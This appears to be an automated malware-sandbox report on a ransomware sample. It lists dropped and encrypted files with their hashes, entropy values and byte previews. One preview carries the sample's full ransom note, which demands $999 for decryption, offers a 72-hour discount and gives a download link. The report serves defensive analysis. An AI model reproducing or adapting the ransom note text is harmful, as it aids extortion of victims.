              SHA-256:8D5A798D417CBA9BF88C1E9EAC993567154A0296236DC72664F335349B2E41BD
              SHA-512:BFCC17F4988078B9167A4AFCD7F4AEE31CE8CF7F647B1DEB37336BC258C1A5E2F0E3E11FAE28106E60DFA188F65A2400C83A1032BD0B6337BFCE514A77C71B9A
              Malicious:false
              Preview:Micro$......HINr........P\.{....%.q.R....I......d.CjK..wg<.L......2.:y....R..3....^. .+...^>V...C..yo-N....@t....Zq.RXG.w!...D...........F.kN..jp...mD....Z.....(..3{.p..xL.N......+F.f.w..@....=$${..J.\.d=..:d.9....Z...SHH%.c...G....et.8.]<%...l@1 6.o+A s.pD1KZ.....o....q.f9.z..S......(.(qL<..N4..{..X.%t...1.g..Kl.Q.&........>.....;?.3.....92gB..".1..I.`....J..#...C..H..... ....\.z9..z*..v...E.....v.T..+....A7..N...Bf+.M....Wp.^ ._...c....@......wj*.;...u...;K.{..P..)C]X..N.o.(...@...IZ..............P6..s.{....T'.b..... x..a..`Wok..]..).t...mv2.w.o.C.(k....@.#:B3...H+..!.p]....~Q'...:\ \..Z.o...]...{......or..B...>...@`....{.6.J...R... 7<.9.i..?...4.P\A..}.....j.....`.A..{AS..T.cv.O.J.E,..&.H....,{m...yNkw..a....`=.9.....p.........cZg....{o=..dl.j..j...b...F..h..=E;o+......}..C.L..D.?.....G,[f.w$...&..t.....6.Z...`V.|.y.....S......>'.AM..E7.#..NJ..^..,........H]D.F.@-E...r.jS.$..d......d.s.,?.....QA.+T.........,..% ../D..Ey
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1192270
              Entropy (8bit):5.66210190005185
              Encrypted:false
              SSDEEP:12288:KHbTLgNYFwVjYbJQ4aKVmaS4aMz8Pg3lxJo2cvXtS:KHL0UwhcBaKVzaYcAqtS
              MD5:8D978CCCDB06ADB3D2D7278D7FAADD3D
              SHA1:158C820E6F98D90A87D00B5764B9FF10469D6224
              SHA-256:008A3EA49C38B55C3866093CCA44A3EC9270469FC82C7555D0BBC8A15DC74176
              SHA-512:438C6D63B15A26CD5137F80326D6569F144334F871ADDB545486F6237F9117B350B41AE74E101FCFFAFDBA9BDD44CCCF734DBCA16EFCB6567924AC035BEBF9EA
              Malicious:false
              Preview:Micro...?|.!P..+Y.w.3...LW...[f`....g.. .!-....Fd&].2'u%..dc....0^.a..P..b.w.u....Xs..u.....O....S...9e....(..U.G..q.v..P.6P.:D...@up....I.1H..9..u.T..0].on....^......P......)....P.F...>....{-j..p....j...J..n....@y?t...\..J.m(o.oW.....@...~p.f..3....|.Q_.mg..S.AqE..?...p..-5;...A.@.......\.9J.._...m.k..mT.J{.....c.......z...{....'.5.m........nc.O5..z...Q.....6.#@..c.......|N.0..BR.d.'.J.3.._...T.%E....-...".P).#./.I..R...2K......g].B....gS.K.7Gn..@....7..<.QZ.N._Z.|w.8....JhO.5}.(.;...q..........<S.1%'......x....b..;;be}....lA..~.v.W.SW51.d3.0..>MkCZ..".u....T0 .o.R4'}....s.+iT{.g.m.W..\`..>...ETy.D.U..E..Cw.?Y....s._.....h62< ......(Nl...f../v....!P!.G...w.4.... X...).3s.^S..k....@./O6...0lI.>;.H...,.R...v.....1.G..L.qK...l...|(3.jtr.....i..*B..E.a.9......U7..e..pf..9.>...Sc._$omC..=j/.UL.C!.@....w..?...J"/.x..&..yG..]...B..../...F>m./A.Q]gn....a....0c.7...r..;U....s......pJ..^.....~.b..{...{2.......%..........^q..L...I..HH.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):30179
              Entropy (8bit):7.995052266268647
              Encrypted:true
              SSDEEP:768:1hYbUR5cEpj6siZ2hmhtnHKh0Q/ChN0xLb0r:goLH26mhdq0Q6hKBI
              MD5:C32195FEFC4F399AC4DD2F27B6FCFB0B
              SHA1:EA0D697E7D4C6C7A649BC2EFCA4A41012826DA61
              SHA-256:0FAEF144B4D43E146D30A42C3F73E8F879FB9BF1FEA1A5BC1215A2D5A3D7B1EA
              SHA-512:566D6542627846DE8D09F75427D5C0C122EF4AC8381603DD74E6724940CCA1E271DD19A4F374777C0F5C660A6B05E6816A51257BB8CBF0E67757E22730CB5833
              Malicious:true
              Preview:05-10.q.vJm.#hq.%..^Hy....4{U..W.!....B.f.`*.U].U..aU..|+W.I....)....\.....8..,.L..?Th6..v.XWP.....m.Cs8.s.4.-P..?T.Z@....>M.q.k.....x[6^...)W`...Bm+..D".u0..A...z..3;.x*.W..9..R..f[z..'.~.2c.4..]"..R........=n|.`.+m..,c.....7..P....h..QJg.!....xgT...[O..V..._.`o{`5....@Fb...\.."......i...5p..3...H..G.ex4....3Y ....,Q.!...z...9=&l....~.....R.n. .`f.a.n,..?j&.e.r.B,s.-B...O..}s.2.......... '..2.q..N*..J".G...I...@?*..s....../.....:f'b....'.[...E..I..GP....%&[wq .85...o......N_..9e...I.....".1.m.$c.l....hX.&_..._<.....X.C@..........z:...o.O..Y......N...L..........0.PA..F+...e..-...+...r.m../.'n.w<P..R.@#qi.B.o2p...QZ'.."....]b..:,.:...=.ET.....m.X.wn..$./Q..K.?O.*....."G%...`Q0L.-f..$.Wb.....8..q.x..i..T8.0.....N..6+...f.2[.f.=..I..Y.l.zS...M...b.y.v;t...{.Y.i ./-..4.n..+I.CM..7...;...0.s..{Y.0........Y.k)..."#Kt.d.W._@.o=tPI.0Z..._.$...E...K;.McW...+..Ww..H;p.0a....M...].M......E..i...-..\..>j....<.Y.G..JoT.;X....k.fB~f{1...d.H]..(.-.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Google Chrome extension, version 3539941635
              Category:dropped
              Size (bytes):248865
              Entropy (8bit):7.985631240917467
              Encrypted:false
              SSDEEP:6144:XX1/zZw7NRIyVZVCpjBXvW6c6Dk3lA4BVcaxlnfB:n1LZw7NRIgVmluA8Vn5
              MD5:C9ADF0519E55F921889AFD6FD7CBF239
              SHA1:605FEF61C81E79CD13AD4F92B4D3A1109AC96A3F
              SHA-256:D21AE47F24EA2F6A25AFE03CE1C29C21F56A1A67E6BC0C9A9A716A5EDD4DF543
              SHA-512:AF88AB678123B2963005EDD0EA2E0908ACF1643AA29F3AF589FA5691220CA275F46C49F4981EBE7C6638572D60BBF9AA0245C62A3A67F073CE20203A8A5AC765
              Malicious:false
              Preview:Cr24.9..?(.=.H~`.g..d..J...4.%=F.t.^.[....C........$.....4v.%...=.Mp.....q.....h...x.[.7......s...^.~~e.t...X.V..W(......._../..S.....F.;.:..C.v...r$g..~X.....].8:..]...[.F"....4..X5DMS..s.DU.....6....m.......tyTp...f.#....q.......Fdo..+..t.0......n...."L.D.u....".5@.sYk..m8\...........(.{....[....%...al..9R...K......;...ui.0.......a..E.........../.'..iX4...._..<..4.......m..........4./.&....bQ..5..}.l..7..F........../6`b.i.7...W...li.x~...3~.Q..}2f@.j.d5..&...EvUv....H.[.;..^O'..daZ.D.z...;.ze..C..1..:C..C.G|.D.m..@....s$.O......=...Q.y.MR".%.L...n..T...#.fdc]M..k/7.......H.uA._"...wB{...@=..).>c...@b.Mb.B\...6.;..,.#x....c..3.;p`ab.(......n.4u.#..D....o.......g...".P`....._.{.J..q....8......=..j.n..H...A.3.(j.=.m.`..\.dL=...cO.t..Y....ul..BAf.cj..5..g+.._r..t(..e+{......a.'.R..l.V......<7......u... ]+.[.....0.f.}.....~6.E.l.Z..>E...G....%..........7..hSqM..b.....n,(|.....o...^.+...bd.....m..s....u.]U.).CP.a.....+.C........h
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:Google Chrome extension, version 3334971395
              Category:dropped
              Size (bytes):1332939
              Entropy (8bit):7.991191232800492
              Encrypted:true
              SSDEEP:24576:p5p5txEhzVJofhWbwK1GbejcrbBdXYQHv6voyQFQRHI0oTFU8zatMxpSA6MLJ:J545L371GFrbBKiyGAo0EzatGaA
              MD5:5F526F0DEFC4FFD74D71E0A3C01ED0F2
              SHA1:C35601A3EAADCC0FD7EB15A93AA4B02F9C40548E
              SHA-256:9F3451D123EF3CDECA93EB99BE5AD187B29AA8DDCA6CAD168A408F92DE1223F4
              SHA-512:F17238BB9822842D7DD57F0E38F673DE61AE4F7B3FE8811D7EC40D2DF76235DA3065F9C03C1D2154497A20E8EADA5A22A0EB5D4DBE74264E82C6F6F4C39B64FB
              Malicious:false
              Preview:Cr24....<...............qB.:p......~|@.J.....l...,.a....b{b..i.E.!f...qU..m..x...B...(t.w.q..e.)....w.Dh.......9..g.+....~i..|.~..?[h;.V.~..$c.2..7....ay.<U...vk.2.*..{......Bw..C.......\..Q..E-8*.@....5.l......d../4..v2.]...prv...tT.1....o....t."Pe..3..lK..;...D.6.@!m....R[..Lq......KZ...`.a.I......e...u_....?..Y...@..5..}..y.4.F.J.......6..=.*.....!..Qm....bh.{..*y...t.......G!.%..gk...l....S.C.[Qa.u%..............].....<./.vh.....N.Xa$.$:...h....(.f'.... .-.Gq...0B.>0.e..(Y.,q....f.&.&S....V.........'%.*.Y..%X..02@.1.....72...T=X..V_..9.u.Q....d..,.U3........mh...6..XTa.3P.%`Z..pF....`YZ...#.'./.y...&.E...H.....6-.-._...u..\.,.Kg....,..n..&...#.....).....M.K.......8..<@...B5.....@.....So.1...P.]...k4.z.x.c r2;/.`...fc5......I...W...r....S.G..../R.Mu.L.2oe.&J......l.o.q.,)....,.p.......8..E\.11r...m..yot.......@.E.a.|......?..i.s..`.h.....ew.~...<..1o...r.^.O..6..2\.........@).84...z..9#...4.:.b.0...h.._6^..$k;k.-.!+f.|..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):8029
              Entropy (8bit):7.978835812926539
              Encrypted:false
              SSDEEP:192:DAYMRl48dWuPiN1AkZ9BS4a3Kkvrv4yuZK6QKxiRSZ:0fRlHxPO1x1Sd3KgrgZjM2
              MD5:517CFE98058F8A4DC37B41BD791BA876
              SHA1:C04EE0BCF783C9F1AEA10320D5176E8395C5A458
              SHA-256:1E2FDC3DFB96B61B23B3B22DBEA6DD5D200AE1BA113DB623E1EA64744C3B361B
              SHA-512:FE1D0899EF89D9234B49C7B9E1A29AB50A998B7F302E73B01EF8C112E2FF2404686C0F61BB9852DADDD907264F61AE3F37E49A5CA4EF2DA6D900D30EC2D95987
              Malicious:false
              Preview:/****>..%w1...a....\...LV.l.Bl4g(.m#...K....YU.B>'..6...z)..1....j..X...".L.\/2....Q...W.l....>.j...v.2.*....iqE..W...vB...2.t..,..u.....}.k?[.....*!.o..(7.I7.....p..WC...C.J9".S.]..X..$.x..S?8....yE..`.).o%....7..m#...'.(.). `28U...l_......u...=...vD.9d....8. ......<:..-w.}[@..c...........MT.V......."..!.i.".I..+[Z.#.HH.`L...\.....5..k. .i.a.......3.q.YD..B...=.;t.78.....q;.....v.H......7...-.............<(...=....!0..l...B.V}.."..8.m)k=...i.m.*:..V...7..{.]......:.t....b=..T.....w.E..^.2....G.......[^...........E..5.%.....`..P.s...A..*......I...5.K..|...3.@.'M....j.X`..R..e..*.$.q:..j,.F..wuiu..-1....*3"L Z.y).m..bo/......og..WP.~^@..T\<......h..=.'..l..)V.."Vw ..<p....~....Qpm.!)g`..K..sU..$8_.*.............O..s..`.j.%[ lN.j......<v,0. .(..}..qD..t.0.(:lt.B..F==.4.....y..S.X@h...u..<...V....\R....F.f8..!U.....J[.'_.q..J..C.......M..&J."..er41.:.S..r........%......L/C........p.l.=...o.R.Nc.<.].+6.....w.u.if.fw.!..h.Z{..v.....S..$G.O..$.Qh.
              Process:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1381
              Entropy (8bit):4.87972850781078
              Encrypted:false
              SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYfJeKAUEuWEYNKCzmFRqrs6314kA+GT/kF5M2/kJw3Rx:WZHfv0pfNAU5WEYNKCzPs41rDGT0f/k0
              MD5:242ED9093DBD2B45ED7A82B7BCCFEF72
              SHA1:FF3E9910D40999CA2F85F642F4AD7DDE53F9CFDE
              SHA-256:D8C1F5BD75A74514C114D902DD449FAE1ACAF6856B3EBD2BD6E3319BCE2ED968
              SHA-512:65196DA7590F9AC581160AFF99A15BAC5435A989EB48F668519CE31416DBE7BAA74DFFC446FFBA082AE9FC0AD26E3CEFBFAEAD245C81F4B7C72C2DB1605292F9
              Malicious:true
              Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...Do not ask assistants from youtube and recovery data sites for help in recovering your data...They can use your free decryption quota and scam you...Our contact is emails in this text document only...You can get and look video overview decrypt tool:..https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d..Price of private key and decrypt software is $999...Discount 50% available if you contact us first 72 hours, that's price for you is $49
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):894
              Entropy (8bit):7.750131116574549
              Encrypted:false
              SSDEEP:24:Y47pkRJxPKqvB80H/QLWnhuRdDQe8hHDDp7bD:Y9Kq20YWUA/DtD
              MD5:A914882C33A69762BB2234ADC1EFD61B
              SHA1:3E8EAA17A9B9DA8C43E9F684ED4899515D475BCD
              SHA-256:BD8819B37F43A1D6E64C899CBE622871DF547FF4E27EE9DD25242826A68D4E2A
              SHA-512:30D60A4C763DEB8A1ED688238EA54A93722D91BB3C1B33A2F83EFB5B8695C317022EEA4B39B3192E7BF334E6309D4F78BDCCD9155EA244A5ED12A7DA62529EC9
              Malicious:false
              Preview:{"pub....%..Y..<.,..es..l#X.M....f.!.....?P...j.f..w..T._,..}..w...&p..}.?..T..Q.U.D.e..+......!;..4..".G=!^q..].0...%t.c..........."A.!.:..i.....S..h..{.:I..uBFU..t.R.W......]....veWc.Vb..].....ox.1..<W...j..)f.-....l..:.$..b.Uv.I...`.g.+.U.P....C..Di%&.]LK.T.....o...a.b`.2.!..{........Z&6.g.u..i..@....%..>.....3....b...$73p..}.9`.C.......N....vw....7.p*.K..w.&VwP.....vDG...r..IY.:..2..c....<.8mT.q..z.j.!.......W>Vk.C...2.........u=..4.....g.../.....u........`.Q.BB.y1..g%......*.1.Nr.1Jc..U.....$FL.\hR.]....;...if.~...\...!.r..`.?C..yE.yUp%.=...KPud.a.Z..d..w...Ta....8b8.0qz.OhAT.$....v<........./....WY...E_DZ1Y.(l......C8....r.MZ[]...$..\'R<..M...K.....q.vW.7...cN*....'.n...C....[...I..EI..1..7@....C..x...8,.=p.P..`h...&..n..8c..3..xe.H.4ho....._#..V.w....l".kk.`P.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):831488
              Entropy (8bit):7.21116287983223
              Encrypted:false
              SSDEEP:24576:60oeRhL4Zihw/WaRupypku1ADMH0h0kT:60J482RuRuQMm
              MD5:7972B08246E568495D9D116FC2D0B159
              SHA1:3E12225494F08369858453FD9FC7481B4F788165
              SHA-256:2A6C90C8DB27E6AC04C7E339DFE4B3C2D47A292BCF6FC1C5B4E0AE62FC81FF84
              SHA-512:F0EAD246F31D1BADB3CD5FD67CB5B3081F027FDAD44DD50364734D61722F1BC2CACB1AD5D842CA3F7000A2699E7BDF059A508B54A95F5E155AE274D70E833FF7
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 71%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........H.z...z...z.......z....!..z.......z....,..z...z...z.......z....%..z...."..z..Rich.z..................PE..L....i.e.............................M....... ....@...........................%......`..........................................P.....$.."..........................................................X4..@............................................text...j........................... ..`.data...(s... ...x..................@....rsrc...."....$..$..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:ASCII text, with CRLF line terminators
              Category:modified
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):342
              Entropy (8bit):7.244797288705816
              Encrypted:false
              SSDEEP:6:KWC9dUnf4ZjmNp1F8/CfOURMFFLvnN6AWvAYh9U+l83ukIcii96Z:NWdUgZ68zpTWv9Dl0ukIcii9a
              MD5:D81260EC025294DC5D6589D06A76C424
              SHA1:4237EE3616BB2C2AE0048EA4627B6A30232366F4
              SHA-256:23AFC8A526A0F4D541D4E3D2382B2DFD746BD38200CB300279A8E465997A6CB8
              SHA-512:A48579D20D9EECB7105D4EDECDEEB8E0E0537B505B4A4CD848FF4D98517A3F5D1FF464A4F3F31AB36F11695153D6F2CBCABFDB4FFF21656E44E6CF6FDF87CC9E
              Malicious:false
              Preview:insecj.....Fo...(..O/8I...{..d....,_..O..".....U..1.Di..>.BY;../e0...H.s.....!.PQ.\l.....)8..7.+.,.^5...zr=/..}..F..Rq.Y$h.....o.3..'......FU].F2t...\w.iS.0.1..n!k.#?P..`...5.....w.o5..,......6.][&.".[..8....%...F......Dvi.."..`.Csj.bh.%S..>....C...BK..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):370
              Entropy (8bit):7.259799629762511
              Encrypted:false
              SSDEEP:6:a45xyq/tCydjkFMVj6G5zKtwba9panU4vFnoFKb5OPJQrdezbcgm743ukIcii96Z:a0TCyRk2Vj6G9Kga9pazvFmQ5/hib67r
              MD5:96D0503E4C7F0BBD99EA09FE6692F226
              SHA1:2F9327B96A2FC2B04043F4A7240C77F80E4F43D0
              SHA-256:4BC0159F5155E7153B42F151149059DD6E07A7F9C1BBA2E93D10C71813F47743
              SHA-512:06B008910839FF96030039446F657269CC4BDCF24C9465C9CD5E8A8EDBFCFE63884A8C3DEB39F7EB2FDEA36FCF29C6A0147150E63D54D5B1A4DE51396D59E782
              Malicious:false
              Preview:%PDFTT....aX.i.Z.;.z...f]....)J..9.I<d...O6.j.....Uw..`*.!G.....v.b. ..d>D[F...(.*....~.]....n...\..{.J....%...r.G.C..bm......E........V....Q..M+...N..Z.\.*..%...#f...X.-J..P-...fu .u.!...\...._.nJ`$...Sd[.j..`.{\'<.e.....t8nE...g`e...t..(.l..!+..`A..XY$..p>s9.Eth.~9...dYa...^..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):388
              Entropy (8bit):7.383956256286208
              Encrypted:false
              SSDEEP:12:DePrenErgMkyHQbe9MSdJ25bKlYukIcii9a:8FrgMRuWJ2QFbD
              MD5:2FEFCEB19FC46F6E40F7927DF49C2152
              SHA1:BE9F35721A6C7F4DC4A8C47D515A3DE4366DA1E4
              SHA-256:A717C17B09479FE0212CE07FD7F4DAB7BAC0892EB37DA023CA81CDCAA5C970CE
              SHA-512:0CA3A6F1EEFF2AD94551A51B9C77D5AE9D9FDF6FF8A695A2875B65B89B06582C56CAE43B65CE4378C0A184E0AFF6DDDD2D3210BFEBF433D7C0DF6483DAED05CF
              Malicious:false
              Preview:%PDFTQ..W.w.... .n.E..[....~=..........X......._.3[G...qaK....\.-..V.~.-{.3..G[..3.Q..#......]..m.j.P*X.........[.'...a..hC...:!.r.E..9a......@.A..C..9J.../.*a.1....w.6...#4..|9.rt.[G.PZ.1i.9..O.U.V....&k..s.B..i....N.RI.............nB.C....S....z..m!\...m..`....Y...?.$..f...3.].mH..&a..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1352
              Entropy (8bit):7.871491036104282
              Encrypted:false
              SSDEEP:24:r4n3/G5E4B72Da3l4V1b+ZYJTmcTSMdVvtO+kzAjbc4HYU7bD:r43/G5NqeVMthjhVIAn1D
              MD5:B528CA43652B1822A6606A8FDBDDA95A
              SHA1:3748C8A638282E922BE9DCA82702FE817AB2526A
              SHA-256:7820B3DCF137E151CF82945D6B18CE1442B097A1992726CAAE6D0C8668941868
              SHA-512:BAA65B87E1E8400B91798C2F70564353B3196523434D19486C06CE087C5EC9989AC27E11C71EB49E07298580BB60F8546B58C3438CF183B1F750D6597EDBC358
              Malicious:false
              Preview:<?xml.*!#..{.Q..Ewu#FC:<..s...V..<..z....F..#4U...$.H..J._d`..q..MQ..)..........eo2x<...!ia.-}.c.u...b...L.."..V}.M.T...rl..l..<..*..(.3p.......lg..\[........Z.n:.3.s.$VO......U^...d..+.WM..`.W.G..... .......1........4....{.....W...(G...E...5... .).m...0..;.D.1...l?....A.O..PQ.~l.:#,.F...O..$s...a9,.X..P...w...YI...O]..'....<....C.........o...<._...1....E........l'`.d..;.........\V...i.&...$.]........#V..l.Ug:.F..8.T....xj.1!3..K.=..\{c....*~.Q.M.F8....,..hw..L).f.a.@.6..B.~.]....Ke+..W..]...~..p.T.W..&.X.....r.....".1 ..]....0..t.iv.y<...qU>.qq.z.....o...?F...F.`R...w..9...X.W.3DL.44g'j....[$...1A.....!... 4......{..8+...ROFv..R}....!..e2.J..J$....:......kd3..........FN....N..#...^..].0.}.a.!.......fY.C)..t$=..C.3h.G..[..r.....q.. 0d..fI.f..'(.ule-b.......u..........\.P.M..4l.,.]H.A.>%.!4Xd..k..I.F.a;j....E%.Y.+.~.L..4.0...q3...4..F.e.-DZ./....B.o.1._,.*]...:...?...7.f.....x......c#..(..T#/.t..s.w=lh.^&...q\2iE..t|F'q...h..f.#oj
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2445
              Entropy (8bit):7.922104892987046
              Encrypted:false
              SSDEEP:48:d6dl2xuJiUtZ6UXIWpceMCNmEL4uIOvFiVArzfGogRUqr5Cz83ErTD:eYxuoe4zCH4+v4VEjo/9UZj
              MD5:F1C2D072ECF82BC137B6942D93A84C77
              SHA1:895AF2D18584926D86F57A887A2F9DD7515174A7
              SHA-256:6C316E3F0A616264A453A194D4BCE1A21E4872981B8BA9400262F62867BC55AC
              SHA-512:DD7556B20918554FE1E0CE826AE580905D52B0B6F730D1CB6509407C64F7A24B1505B5A15CFBD90709875335FF03F6ADC97566D6944FFC3C4E6BFB0A0E260AD1
              Malicious:false
              Preview:<?xml......=..p..?.w...-.n.q.0.G.....;J0....8..I.#z).s..,&..k....@.r.%z.v ....h....~f._PSN......#....?...jA.n.zf.....5|......(....E.Z.x....w..j.N....{....\,l...n..\...JU.sK.B.#h..:....2rVhg..>..0..1.-.n....!.L...q..>U.p..TV.H.a.I...y...)oY....m...1..G~N..`....".An.q.z.4.<.E (...XA.I.z.J...O#....|..m...~`......;)..%..K...Z..i/*4....t.A6n...h/.U....Ep....+jr.6d..Z........_..&.S`....T<.L.....2.....F..h.......- ....v.../.xh{.IB.o.a.....?.e.P.A...F..zY....#.....g.*.*...._O..)( ..........uF.{B<1.S..o......I.%...^...3...v..5...^.D...~yM.=Q=..>..j..k.D..&.....1.v6..^.c!......]. Z../..i..G[...O;...._0..?>H....d.C:..L.k..]kC.z..*....k...l:....4.]..S:..~..~...X;W...Q..$.].Mw..K.GW1HJ...\}.. ..V.\....,-^...5...c.......~...~..2...........3.^..,...C..e....<.u.~=....k ...a...t.RR..../.~a..K"...t0/.xZGXTA...=7..+Z...r.1.q.@.....&.(.T..6G.CwOG..<....;.G...YIwa..$.YDm......|."!.u...YKE..g.c.B...c0h.s<K./......-.r....y..M.......w..U.m....I..h.q.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2402
              Entropy (8bit):7.917364432149371
              Encrypted:false
              SSDEEP:48:0uUzp4VY3Q8xJ6va0vpc/yQr6if0o8N2z70hgtwwl/h2D:dq2VYvJO9pQ3f0o8Jgtnl/w
              MD5:33315B108480D10F1C39C7B7F0BCF49E
              SHA1:12EB025E2436B65326939E6D889842EA0A876D10
              SHA-256:64264318A27D212299F8498FDCC89446F2A4810637D0C0AEE6CC7D1E0FEAE14B
              SHA-512:F086FDB1D0329C80EC2CD54DE658415E58FBF051578DE31D62C87BBA4D05DB2282543F6BF832BD657BF0D6C8D5B83FD9D1CFB3DDC55EA77F4DFAB3C05A955DE1
              Malicious:false
              Preview:<?xml$..k...vbb,X....f..1..d.....ie...tC......C..9..O.......+..Y...0sO.s..Z.>....F...C.d..V..tl.]9Q...A..jE..k....j....] ..(.`...R...0J..[.J....vX...0&....F.5+t..... H.DKX...6.jQ1}N.?...}.`.....o.Uui.].[..!....2j\F..Q..fgd.NJ<wRV...-...'o.).......@r....%~kYc..q. . w....0.*../C.......h..3....L....9.D.8.o.B.w`...g.0.....O..ar>.suf.......]kC.G...Q.I.>4v;...~pWR..by.9....".E...c.X....|.y...c...y....d. |e.U5...H.1.3Xc2l..n..g...F#..!...[..MnC.C...}....)wj...G..p..7.l..7.l'#.]..x....<e....H..-G..h.@.u..+l*....F..$_v#......\....(..[......XO.wJ..>*g.J.w.8'e...r.C.0...-.........$..|..W.._1.9...I.....b.>b.U.......y.....N?.....w..s..AV\....*...{..j.ck>.....6.Av6...d/..u&..I.Hx..E..}.mK....{Q...BeW.........o..]m`B9.b......j`w...L......l...4.&........{.....m.}........U ..7....b..O.....deJ.5G...X...........1f....M.`il. .A...9P.....[L..+.u8-q. ".RV...... :....W...]..@.7...*R..E.....F.rR?I`....g.H.pP....k$...h.9A..&..../V....(G1.(.b..fe6.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2420
              Entropy (8bit):7.919024903804336
              Encrypted:false
              SSDEEP:48:ch+YpMmtFip3U5WB7hgsGeoCnRK0biEq4qiRub4ZqXxT366D:chpM6AoWPiQoqiQhUcS
              MD5:81F3C7C9F712F6D485B37A08D181B823
              SHA1:2309D06671115880324CA79F415D13E35B00A5B5
              SHA-256:DEBDFB309C6AABB2CCF185CF89CE48CD1D07CCE1E4A47072585A4587F6A62682
              SHA-512:F5F7874A7BE04DF3DB711AE12A4F124B462F660CBEF8285631A61A7DD9C54117EFDCB516EEF8D4E62166DB279A678F87CCA820537F07286A74AFF31809E07FDF
              Malicious:false
              Preview:<?xmliW..:....'.CQ...y..c1pt.X.U&..ZeV@7..t....7.A....2....P....c...PT\.E..T..!F.2..q_cs.#E.....t.R$u.../.AG... .7$..-U..m..._.5.[........^.O....i..N.#..R..b.....N.....,......n6S6x2.JI..t.....'Xh/..........!C'|.%.u......rA.U...cvk..|.Ib.q..nA.)h|..WxD.g.......|!..$K9*.z..n....#.]h.....9.+..Z....fd.-+....]..kg.....F,(k)...q.....l....LpG<..U...W+.7..VC..d,v^.m...V."....rg`....w.6...%.l.(..._3.....k......(..I..'....."..'9..k...yO.,...)...!W.hP........H......2|.D.8.N..L...4.QH..W...X..........G...'X.?...VUS...L..]..B...$gf.b...l..;.#..uP..okl......./<.K.I~Y.PV{9..a..R..\2jo...*(..b..w..G*.45...~...0SP3q......".. ...r7h........XQKW..r...iU!7...|......."....c@fU>..|.1f..*g......3T.m.E...BE.H.$.Z.....:\'.!.IJ.v,,XMh....<.........\8..f...u..oG...G...........BQ....=.f..06.y,[1L..t.;.....%.Y.6..O.d.D.......v..j....8...~..7#.6.:b.J....)..}.^.G..,.........H4.|]......_.....V...8...../............s.KA.+.E..2.5.t....I.7...F.H.....&t./.@.2..?...7...
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1358
              Entropy (8bit):7.844532569402387
              Encrypted:false
              SSDEEP:24:Hsly0zwH86/8Fuem4vjHHDdGITvtz9ECcQkXdW6v8hankT0PuakAuHeMQKuZIbD:HmzwXEF1pLnDjtz9KrnEhanHfUeMLvD
              MD5:BAF69535FB71D61726DC2B153B6F80F0
              SHA1:3898D12E0F20BD2C21EB03F3367BFFFC60FB1FCE
              SHA-256:B277B7906A64F71B132F65CBDC57B08A9878709C02256E88ABE22DAB9B9A7A4B
              SHA-512:CB2B56E47277A7543B7E586D053DAA4ED135D9600F32AA458F7E3DC0E9657C16A268151FD52C2EF0EA9B0F0484E73CFDB40083C126E8D457194D5BE6F2749486
              Malicious:false
